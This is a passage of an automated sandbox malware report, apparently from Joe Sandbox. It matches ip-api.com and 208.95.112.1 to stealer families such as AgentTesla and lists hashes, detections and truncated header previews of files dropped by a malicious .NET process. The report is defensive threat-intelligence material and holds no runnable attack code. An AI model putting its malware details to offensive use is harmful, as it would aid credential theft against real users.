208.95.112.1 | juE8dtqPkx.exe | malicious | AgentTesla, PureLog Stealer | ip-api.com/line/?fields=hosting
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ip-api.com | tasAgNgjbJ.exe | malicious | Unknown | 208.95.112.1
ip-api.com | Solara.exe | malicious | Python Stealer, Exela Stealer, Xmrig | 208.95.112.1
ip-api.com | resembleC2.exe | malicious | Blank Grabber, Umbral Stealer | 208.95.112.1
ip-api.com | F0DgoRk0p1.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | fpY3HP2cnH.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | 4287eV6mBc.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | aik1mr9TOq.exe | malicious | Predator | 208.95.112.1
ip-api.com | DUWPFaZd3a.exe | malicious | AgentTesla, DarkTortilla | 208.95.112.1
ip-api.com | tb4B9ni6vl.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | juE8dtqPkx.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TUT-ASUS | tasAgNgjbJ.exe | malicious | Unknown | 208.95.112.1
TUT-ASUS | Solara.exe | malicious | Python Stealer, Exela Stealer, Xmrig | 208.95.112.1
TUT-ASUS | resembleC2.exe | malicious | Blank Grabber, Umbral Stealer | 208.95.112.1
TUT-ASUS | F0DgoRk0p1.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | fpY3HP2cnH.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | 4287eV6mBc.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | aik1mr9TOq.exe | malicious | Predator | 208.95.112.1
TUT-ASUS | DUWPFaZd3a.exe | malicious | AgentTesla, DarkTortilla | 208.95.112.1
TUT-ASUS | tb4B9ni6vl.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | juE8dtqPkx.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
                  No context
                  No context
Process: C:\runtimebrokerHost\webnetdhcp.exe
File Type: ASCII text, with very long lines (940), with no line terminators
Category: dropped
Size (bytes): 940
Entropy (8bit): 5.918359540230003
Encrypted: false
SSDEEP: 24:78xcPFv+QHymjvysFMFF88j2bLewtfkinxLiNiEmvclz:78xcPFv1YsFMFafbLNZkOumElz
MD5: 76002DA45568B62B79AC409D369E2E5D
SHA1: 45D6322A71C642AF575C30CC73063CA5D994AEDB
SHA-256: 030060C42C9A7B21CF386B9300431B5010E1C1C89606DC760533BB06F67E7A7D
SHA-512: 5E77F3405936C1D35CA75DF1EDD31C307F82AA5442965A908F59EC83EA945BD189D843E3A0F79F1A01B1C45B86750506518A4F10977A28E968EA161F649B2AA4
Malicious: false
Reputation: low
Process: C:\runtimebrokerHost\webnetdhcp.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 3086848
Entropy (8bit): 7.7307619251577515
Encrypted: false
SSDEEP: 49152:Je1fNayqo7lKdSD6qVvWakQ4BnFxFkUP6IqG7bZ0Z2lOWvOhvECUQ:GNuAD3vyQ9bLG7yglVv4vHU
MD5: EEC01D18C981A5973DA10C8CBAC73764
SHA1: A366E8AFF64B3B84C129A54615700B9A6A3238C1
SHA-256: 4C8610C40E37FB70DA6B33AD42C7F5D8A0CC34A16C34A3837AF521EFBF79FA2F
SHA-512: 6425DD22C982BE9BC1B10A5B885CA1E610B6EE30F2C3A5181F5D6BCDB5A84BDF6B4A5A851C9552F9B7B1F29D5141ECD2FFB0D00D41F3B70C64F7F332A877F165
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Avira, Detection: 100%
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 88%
Reputation: low
Process: C:\runtimebrokerHost\webnetdhcp.exe
File Type: ASCII text, with very long lines (525), with no line terminators
Category: dropped
Size (bytes): 525
Entropy (8bit): 5.849132361841309
Encrypted: false
SSDEEP: 12:kKKopIEjRF8pXR/CX9oxP/6cxVFrA/4MFix60ZrRzYjg4WeP:l3pvSJkX9EP/6unrCox601R94WeP
MD5: BF88470E2EF06444809759791CE518D6
SHA1: 298041AB8C08940B200F2326D1D1895A8E367AD4
SHA-256: 4BFF516925F81B4248BC46B8C1D4EDCFA8E6C631446F5E13F9465D5F60835575
SHA-512: 48C1B965C6DCBCFC8BEC9A3F9AD24C554469BB4ED88F43FE597F15DD3E92524427FDDD7514281FA305553F3C23F1B03F46214DEDC13428622ECE8252BF57BD8F
Malicious: false
Process: C:\runtimebrokerHost\webnetdhcp.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 3086848
Entropy (8bit): 7.7307619251577515
Encrypted: false
SSDEEP: 49152:Je1fNayqo7lKdSD6qVvWakQ4BnFxFkUP6IqG7bZ0Z2lOWvOhvECUQ:GNuAD3vyQ9bLG7yglVv4vHU
MD5: EEC01D18C981A5973DA10C8CBAC73764
SHA1: A366E8AFF64B3B84C129A54615700B9A6A3238C1
SHA-256: 4C8610C40E37FB70DA6B33AD42C7F5D8A0CC34A16C34A3837AF521EFBF79FA2F
SHA-512: 6425DD22C982BE9BC1B10A5B885CA1E610B6EE30F2C3A5181F5D6BCDB5A84BDF6B4A5A851C9552F9B7B1F29D5141ECD2FFB0D00D41F3B70C64F7F332A877F165
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Avira, Detection: 100%
• Antivirus: Avira, Detection: 100%
• Antivirus: Avira, Detection: 100%
• Antivirus: Avira, Detection: 100%
• Antivirus: Avira, Detection: 100%
• Antivirus: Avira, Detection: 100%
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 88%
Process: C:\runtimebrokerHost\webnetdhcp.exe
File Type: ASCII text, with very long lines (439), with no line terminators
Category: dropped
Size (bytes): 439
Entropy (8bit): 5.840957454971274
Encrypted: false
SSDEEP: 12:6XjucCVbFKkRzQvMKN1CHGq3daOUbXaoJf:iabVYkNoNi3dgbX5F
MD5: 604C3B695B8FA6A2765C5C3B77D0944B
SHA1: 532E6604798FED29936A5317E8B897F1051ECBF5
SHA-256: 21D42D8E5D7B585F56006A78BB2296B437B569BC3A118D9B4DA510B5A8916C04
SHA-512: D58493A1441663A7B7EB6EF63A71AC9FDA04CF297C957612D30543F0CF902F6CF7301D7253231FC63E5C94D3E14F48D629F6E576A70D68FE3A7FC9321ABEA090
Malicious: false
                  Preview:rxL8uQviglNHb1mQCW1hVtXOlWNlVgvKlHGmWZfgdzzRLPc5nMUsOdF7Z7WYCKNA0CfTvA3n1UDf4GCW3R7ILC6IBIMZCHeSmzaJtIJnTr14ZjDT4AevNEzxFWSnxelt0u3Fp3mvHUzeLCtbE3eBnsFh9nDXzgzzFIEoq8nBYsn2PVlDm0i49kFHoVFCzO5le9YD8FvGQdm4FNSoBAu9850fC69V3kLJxCXP6iEhFbof7LCbDaBze6mjJ3BBFZNpRdGCzCsc5M3gQUi04hRdjWo1ZxFDhDcpO8OdE9mAri3SCFSzUKGhHtF4yPnB6p52uNRSFEw55RvBdWyTfQsW64he3TpzWkDCmBhyxAtPYLm08DbbaTgq6j50pxZwZ7jUNsZcyAgegc8vSrfz1NYCEXGCFrIAl70alRnQo9naxBKekKh8Rj4MigQ
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3086848
                  Entropy (8bit):7.7307619251577515
                  Encrypted:false
                  SSDEEP:49152:Je1fNayqo7lKdSD6qVvWakQ4BnFxFkUP6IqG7bZ0Z2lOWvOhvECUQ:GNuAD3vyQ9bLG7yglVv4vHU
                  MD5:EEC01D18C981A5973DA10C8CBAC73764
                  SHA1:A366E8AFF64B3B84C129A54615700B9A6A3238C1
                  SHA-256:4C8610C40E37FB70DA6B33AD42C7F5D8A0CC34A16C34A3837AF521EFBF79FA2F
                  SHA-512:6425DD22C982BE9BC1B10A5B885CA1E610B6EE30F2C3A5181F5D6BCDB5A84BDF6B4A5A851C9552F9B7B1F29D5141ECD2FFB0D00D41F3B70C64F7F332A877F165
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 88%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ..../...@.. ......................../...........@.................................p...K....@/......................`/...................................................... ............... ..H............text........ ...................... ..`.sdata.../..../..0..................@....rsrc........@/......./.............@..@.reloc.......`/......./.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:ASCII text, with very long lines (621), with no line terminators
                  Category:dropped
                  Size (bytes):621
                  Entropy (8bit):5.87601618717999
                  Encrypted:false
                  SSDEEP:12:6850Re2o7zv7hZMN6vUBXamcdATuxFMuiQRX4HRx:b84hmQBx3Z+L
                  MD5:A275BF3BB64F378B2EAED54B68B74921
                  SHA1:AC6CE3FD1E51D1EF50D23B90DE26C670B501053A
                  SHA-256:35A0F173034B5C57ED3DC29F33C54319778979C62B92AACB638E2D895A741EF5
                  SHA-512:91CF3BD37D7AB69B3D2EF0E63BEAEFF1ECE0B11F13E9647E7895E873F70615437BADB8CF9BCDBAA0590031387B6B6505A13AFDCBE8585188B93042F09B2DAB3E
                  Malicious:false
                  Preview:
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3086848
                  Entropy (8bit):7.7307619251577515
                  Encrypted:false
                  SSDEEP:49152:Je1fNayqo7lKdSD6qVvWakQ4BnFxFkUP6IqG7bZ0Z2lOWvOhvECUQ:GNuAD3vyQ9bLG7yglVv4vHU
                  MD5:EEC01D18C981A5973DA10C8CBAC73764
                  SHA1:A366E8AFF64B3B84C129A54615700B9A6A3238C1
                  SHA-256:4C8610C40E37FB70DA6B33AD42C7F5D8A0CC34A16C34A3837AF521EFBF79FA2F
                  SHA-512:6425DD22C982BE9BC1B10A5B885CA1E610B6EE30F2C3A5181F5D6BCDB5A84BDF6B4A5A851C9552F9B7B1F29D5141ECD2FFB0D00D41F3B70C64F7F332A877F165
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 88%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ..../...@.. ......................../...........@.................................p...K....@/......................`/...................................................... ............... ..H............text........ ...................... ..`.sdata.../..../..0..................@....rsrc........@/......./.............@..@.reloc.......`/......./.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:ASCII text, with very long lines (607), with no line terminators
                  Category:dropped
                  Size (bytes):607
                  Entropy (8bit):5.899692363482537
                  Encrypted:false
                  SSDEEP:12:rfB4tl3IDgfQtKYcA7R+VDFRseWhhoivB20DNrJRcl8KAr4Xx/wcZYX+a:rfB3mKKxSR+VDFMh1FDtJRcuRw91a
                  MD5:6351CB25349699F78BCDADC5408A4410
                  SHA1:FC541797E8E09A24DB905839EB108582BA98FB97
                  SHA-256:82007D876AEE2D660F4867C1BEE992D634A87910333594F960D8AABE21BAFE44
                  SHA-512:07185B714DE6DCD0B464F5B47872E3802DC345BEAAEA9AFCD840CD66D260C2FEA3615667BF5E6505F3A4F83FC53227A89AAB1ED1F0C5B0ABB44A87EE73A184C4
                  Malicious:false
                  Preview:
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):300
                  Entropy (8bit):5.802984193378431
                  Encrypted:false
                  SSDEEP:6:KAGCx2JRx8A7SidNKnfwsCpp5Ec46O4f33Me0QdClWu2V0LO9PycwLgfyS:9xx2JDNSiP8fwRSc3VPpxtAzuyS
                  MD5:8073DEA439E042A71C1E2DC16F1DCC90
                  SHA1:A5994951DF2D64D0517B6DCB09601EE76A8F6C23
                  SHA-256:7E7E2E2D359673D405719D2D9F24E08ABEA2BF2021D7D6564100691EA2F97058
                  SHA-512:C9B377ED47D1F6601AC91C3F0FC5CFCF6CCE6C709071578F2CA5B41E91B102C10BD6C6824BBF90CEBDE2779532D404DEEDB54A26BC13E0FA5CF533C558126724
                  Malicious:false
                  Preview:TpqDnRuCcsAo17OvnWUXmfRItOjm1JVgivTI1CqwcI2udeHcqaEArvqyYhTYrILSWdGFnG3lqi4dmgpOHH6aFVzxFfuUsREU7jYAYBzjhcTI0ML12FRkMuNBoTAIWj3ZekgCIo0FSW3mBq72T3bn9dIMWXVEBqN8j4oQqJsNOMSz1l97WHydHPZAbTqvSvElI4CGBrMKKNYxLTVuXYs32u0UfoyWc64cHqr6j35p5oS40myI86Y4DKtYEslX2zrNS5pelYLdcD8Nb6d3zqYgiAZ67S20SixF7El56Ugju5cA
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3086848
                  Entropy (8bit):7.7307619251577515
                  Encrypted:false
                  SSDEEP:49152:Je1fNayqo7lKdSD6qVvWakQ4BnFxFkUP6IqG7bZ0Z2lOWvOhvECUQ:GNuAD3vyQ9bLG7yglVv4vHU
                  MD5:EEC01D18C981A5973DA10C8CBAC73764
                  SHA1:A366E8AFF64B3B84C129A54615700B9A6A3238C1
                  SHA-256:4C8610C40E37FB70DA6B33AD42C7F5D8A0CC34A16C34A3837AF521EFBF79FA2F
                  SHA-512:6425DD22C982BE9BC1B10A5B885CA1E610B6EE30F2C3A5181F5D6BCDB5A84BDF6B4A5A851C9552F9B7B1F29D5141ECD2FFB0D00D41F3B70C64F7F332A877F165
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 88%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ..../...@.. ......................../...........@.................................p...K....@/......................`/...................................................... ............... ..H............text........ ...................... ..`.sdata.../..../..0..................@....rsrc........@/......./.............@..@.reloc.......`/......./.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3086848
                  Entropy (8bit):7.7307619251577515
                  Encrypted:false
                  SSDEEP:49152:Je1fNayqo7lKdSD6qVvWakQ4BnFxFkUP6IqG7bZ0Z2lOWvOhvECUQ:GNuAD3vyQ9bLG7yglVv4vHU
                  MD5:EEC01D18C981A5973DA10C8CBAC73764
                  SHA1:A366E8AFF64B3B84C129A54615700B9A6A3238C1
                  SHA-256:4C8610C40E37FB70DA6B33AD42C7F5D8A0CC34A16C34A3837AF521EFBF79FA2F
                  SHA-512:6425DD22C982BE9BC1B10A5B885CA1E610B6EE30F2C3A5181F5D6BCDB5A84BDF6B4A5A851C9552F9B7B1F29D5141ECD2FFB0D00D41F3B70C64F7F332A877F165
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 88%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ..../...@.. ......................../...........@.................................p...K....@/......................`/...................................................... ............... ..H............text........ ...................... ..`.sdata.../..../..0..................@....rsrc........@/......./.............@..@.reloc.......`/......./.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:ASCII text, with very long lines (540), with no line terminators
                  Category:dropped
                  Size (bytes):540
                  Entropy (8bit):5.870842682022011
                  Encrypted:false
                  SSDEEP:12:89kc7CA+LWhPi0JuyI9B5yAuamWTgmry3DUzC7/D2BGVewVP:bc7CnWe57Q2bTdyTZf5VewVP
                  MD5:C8D12594E4A5681CF96633E5C163A1A0
                  SHA1:B0502B94C7B05C498518191693C2F9401B587F06
                  SHA-256:9FB6C68E993783A8E79E668D2B9E91C3612D3BCAAAA7D315B8E86FA812EB53FD
                  SHA-512:553E3FB9338DFE13056A3B9AE9257D1ED2A5D1B2247A0F838E22398B9CDEF97E7A919B1234A160ED8B286DD853E93242ED21767940D45037635DD9F4437E6610
                  Malicious:false
                  Preview:Vvs1YbJtTXjoTUmhukeQt6ZUBLhSfcxiKhGQwEnJbwQrYffWP5SsxTxYWYzN30O1jBdwOWvq6Uz7qr5fqLCjKFu1tr3YOaQkiZIWBtI3Jmvce0socUgsyoqdRmCgcWbfEOYQjjd6CJaiTRX39P643hw4soFZqlaxKQYQbbE20kpoOIK9OJhNahlgbdi5eDQbtmXD3HbhLDDT2IqjeFKhDNXno1y72JYwTO5lvGGHrACWdRoTx9aY2sXfPtYBSeoBpQ9nMFxX9D0DKAKWNfK3s93l1ZWBsEzMVArMSAGsLDZz2TUOjBywTuTpWYwwtwo4NnrKT7EMZbsojEshEHcrPD3lqBz3NT9ZYfmPmK5l6mW1CoGSqPrlT7pKuGdRIL8FcTQEcc54L0unqBiC5hN8lXFa0bffqodvnRZtYC0NUxadNBeshbWk8AdFNzOA7ZNhX99Ylzo3q9oy6mNy7w8PS2xnxUfix0Q4j3GNBFHrxc48VoIlmZCKa8OeMWkRUFF0ttODf9w2pQbz8ySIM36YxFelolBp
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3086848
                  Entropy (8bit):7.7307619251577515
                  Encrypted:false
                  SSDEEP:49152:Je1fNayqo7lKdSD6qVvWakQ4BnFxFkUP6IqG7bZ0Z2lOWvOhvECUQ:GNuAD3vyQ9bLG7yglVv4vHU
                  MD5:EEC01D18C981A5973DA10C8CBAC73764
                  SHA1:A366E8AFF64B3B84C129A54615700B9A6A3238C1
                  SHA-256:4C8610C40E37FB70DA6B33AD42C7F5D8A0CC34A16C34A3837AF521EFBF79FA2F
                  SHA-512:6425DD22C982BE9BC1B10A5B885CA1E610B6EE30F2C3A5181F5D6BCDB5A84BDF6B4A5A851C9552F9B7B1F29D5141ECD2FFB0D00D41F3B70C64F7F332A877F165
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 88%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ..../...@.. ......................../...........@.................................p...K....@/......................`/...................................................... ............... ..H............text........ ...................... ..`.sdata.../..../..0..................@....rsrc........@/......./.............@..@.reloc.......`/......./.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:ASCII text, with very long lines (453), with no line terminators
                  Category:dropped
                  Size (bytes):453
                  Entropy (8bit):5.866910013793881
                  Encrypted:false
                  SSDEEP:12:oLSJ9LqqrN5AMBg7lvPAlURA2un0aSAMk9:oLWmqrN5dg7lPlGOAx9
                  MD5:F5B362ACA59E760E381C1CB677485022
                  SHA1:E28CCBBED4F247A793C87E3794411014459C7B20
                  SHA-256:D27B5921FD199D69587B526F17ED4B4B6D7A8F6C23076FC1B2F6BFA5357D34CF
                  SHA-512:4186E018692188FA774691D9218D2B2212741377AE6B387C269361FF53956DDB23FB7F50BDD8C21F19D7A1B3097C6FF7BDE88337E71FD049DEF924A832804425
                  Malicious:false
                  Preview:VhMKAFVbHK9rmhf7GiwrH1qlIIqse2glXHAAinRSZgZEoWuxArtWDzTd0kB1Zn7PoXUeheZdQeRlcm6vY2rwIKiiygJ7la3vjKZRCQQgSPFihsBOoQcg6LGezvqBUb20lfCRMptImKd3F9AFe5TU7WzXE5cQkOL1XP7BquC8hU4vrMYzvkgZHh2OqoMQNciX9mf0B8Yu3UxnbDp1gmf9svtzWsVChvvEwgwFqiywMwgxtPwm8Vtk7ipN3qdSnWNHjt05RkK8ysx5P6FH6sDLCKHN1iLAFfIziZOAY1UXKvwOvt87kWW5SBEYlmDtYK2Tj7WzsFsEXqBQY3cHjOatINhhU0Zwyl9A2doyWJPfnSim9y9sK5KJtJKWZzf2p6QwrBY5Onua95F0p5hg0ql2azQtSSZhnXzrBw58aDehLuKxETreS8B9UXV1uom6ONwmGXy39
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3086848
                  Entropy (8bit):7.7307619251577515
                  Encrypted:false
                  SSDEEP:49152:Je1fNayqo7lKdSD6qVvWakQ4BnFxFkUP6IqG7bZ0Z2lOWvOhvECUQ:GNuAD3vyQ9bLG7yglVv4vHU
                  MD5:EEC01D18C981A5973DA10C8CBAC73764
                  SHA1:A366E8AFF64B3B84C129A54615700B9A6A3238C1
                  SHA-256:4C8610C40E37FB70DA6B33AD42C7F5D8A0CC34A16C34A3837AF521EFBF79FA2F
                  SHA-512:6425DD22C982BE9BC1B10A5B885CA1E610B6EE30F2C3A5181F5D6BCDB5A84BDF6B4A5A851C9552F9B7B1F29D5141ECD2FFB0D00D41F3B70C64F7F332A877F165
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 88%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ..../...@.. ......................../...........@.................................p...K....@/......................`/...................................................... ............... ..H............text........ ...................... ..`.sdata.../..../..0..................@....rsrc........@/......./.............@..@.reloc.......`/......./.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:CSV text
                  Category:dropped
                  Size (bytes):2144
                  Entropy (8bit):5.370181720626662
                  Encrypted:false
                  SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpp+vxp3/elTJHVHmHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkhtpQZp/X
                  MD5:AED51D8E24DFF6329D557599397A4AF5
                  SHA1:08FDB23410F7C47067DBEE97FB37F5A09ABCDA52
                  SHA-256:D0BF5F260E6183B5E7BE1B9012AE9AD2C6C432CE03DDC101FCD5769A06DD8160
                  SHA-512:E6AA03BC1249F1D01423907E0770562A8BC30362505E0E03545BAD115F0BAABB8D3D2E37AE7191CCF5AA9BE5480F17317BED8706D6BBFB316E82EFCC2D85C2B1
                  Malicious:false
                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:ASCII text, with very long lines (453), with no line terminators
                  Category:dropped
                  Size (bytes):453
                  Entropy (8bit):5.8670097180463365
                  Encrypted:false
                  SSDEEP:12:uXodcmOCyXbWOHlvZE9u42/KLNhdur4NSR7:QuHOCyXbTHfE94/K5IGSd
                  MD5:68B8A3CA6BBF17FDA7FE3F51C80E1F86
                  SHA1:6790E70712C9316DA9935958DB682E6C885D28B0
                  SHA-256:636206D5E3AEAE24E98D660E58CA867DF10F57C3FE6367AFFEEA028711ACA659
                  SHA-512:C44E4095CB8E6A57D54F268877C1DB23D41D33525C1CC73755287C0A99FAECD73EDF7D3108DEEF0261685015181263F67AEB234C83114F126730082529565D94
                  Malicious:false
                  Preview:aIBJpDEEQOtNKt2dvKeIlpewC0UFT6Ru871edF7ZdstDDvdtjTomlG0voPHyt8uU69ON2YAqNFo35atRXlgARoJ2HF0N8Ipf7ZHDgQ0LS8Zgb6zNgzbIctDS0WFwhwrFZJ5gTpvHuUrSPnaKPmrJqhCNVyNJKEngRUGSBT40EUYHBuDM55g5EiY2GrKecl7prLB4gII6s1EWI4LlvAOPisbs5OLTIZYcXsa0sIqwwjNNdBtMfjtbXrH9tT9R7yxSdl9aeV2mUbc8fOO4f9yjq6FplbGZJYz7v4t1BTrKrGH6PJdfEEv8AOmggUyCOdd5lfMkfX2MRo2kzJZc7lVEm06hSNVreo5NmLUu63ArMjrWWBqW4WFnIYSvipSRBLsmso7ozpfEln2DJkKQg8wHjRFO3jLRlspA1EnsEChP1BCefPl8eBvDYkDbisvQeNd382LF6
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3086848
                  Entropy (8bit):7.7307619251577515
                  Encrypted:false
                  SSDEEP:49152:Je1fNayqo7lKdSD6qVvWakQ4BnFxFkUP6IqG7bZ0Z2lOWvOhvECUQ:GNuAD3vyQ9bLG7yglVv4vHU
                  MD5:EEC01D18C981A5973DA10C8CBAC73764
                  SHA1:A366E8AFF64B3B84C129A54615700B9A6A3238C1
                  SHA-256:4C8610C40E37FB70DA6B33AD42C7F5D8A0CC34A16C34A3837AF521EFBF79FA2F
                  SHA-512:6425DD22C982BE9BC1B10A5B885CA1E610B6EE30F2C3A5181F5D6BCDB5A84BDF6B4A5A851C9552F9B7B1F29D5141ECD2FFB0D00D41F3B70C64F7F332A877F165
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 88%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ..../...@.. ......................../...........@.................................p...K....@/......................`/...................................................... ............... ..H............text........ ...................... ..`.sdata.../..../..0..................@....rsrc........@/......./.............@..@.reloc.......`/......./.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:ASCII text, with very long lines (571), with no line terminators
                  Category:dropped
                  Size (bytes):571
                  Entropy (8bit):5.8828879419951035
                  Encrypted:false
                  SSDEEP:12:kxaowqajGORvs/sdqnaYtFXGil+WPpsWala4/0DvJDyqZqVEruJUZ9x:83aG/sdvYtt2OsWW30DhuaqV0Z9x
                  MD5:B64095CE5826AB4BE827A723E273BF19
                  SHA1:CB6D7FAF7AFD6B3DFB973367ADAAD7616A6A84E7
                  SHA-256:28B05000D12545C7466421D65C7FE634D700823EBFDA87080686DF3DF29AD3DE
                  SHA-512:36DE32C495967B2140CD7CDF546233CD25C7A8CD92312B388BBCFD314EC53DA3F399089A382A7A65476A070784AB1E611CF0577C1F9F57618F0F31A691643C41
                  Malicious:false
                  Preview:
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3086848
                  Entropy (8bit):7.7307619251577515
                  Encrypted:false
                  SSDEEP:49152:Je1fNayqo7lKdSD6qVvWakQ4BnFxFkUP6IqG7bZ0Z2lOWvOhvECUQ:GNuAD3vyQ9bLG7yglVv4vHU
                  MD5:EEC01D18C981A5973DA10C8CBAC73764
                  SHA1:A366E8AFF64B3B84C129A54615700B9A6A3238C1
                  SHA-256:4C8610C40E37FB70DA6B33AD42C7F5D8A0CC34A16C34A3837AF521EFBF79FA2F
                  SHA-512:6425DD22C982BE9BC1B10A5B885CA1E610B6EE30F2C3A5181F5D6BCDB5A84BDF6B4A5A851C9552F9B7B1F29D5141ECD2FFB0D00D41F3B70C64F7F332A877F165
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 88%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ..../...@.. ......................../...........@.................................p...K....@/......................`/...................................................... ............... ..H............text........ ...................... ..`.sdata.../..../..0..................@....rsrc........@/......./.............@..@.reloc.......`/......./.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\runtimebrokerHost\webnetdhcp.exe
                  File Type:ASCII text, with very long lines (343), with no line terminators
                  Category:dropped
                  Size (bytes):343
                  Entropy (8bit):5.8397578781750665
                  Encrypted:false
